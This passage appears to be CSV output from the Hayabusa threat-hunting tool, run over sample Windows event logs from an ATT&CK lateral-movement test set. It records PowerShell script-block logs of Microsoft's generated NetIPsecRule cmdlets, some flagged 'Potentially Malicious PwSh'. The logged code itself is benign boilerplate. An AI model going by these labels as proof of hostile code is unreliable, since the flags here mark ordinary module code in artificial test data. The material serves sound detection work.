[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"yBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 
'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact 
($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, 
$__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,", [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
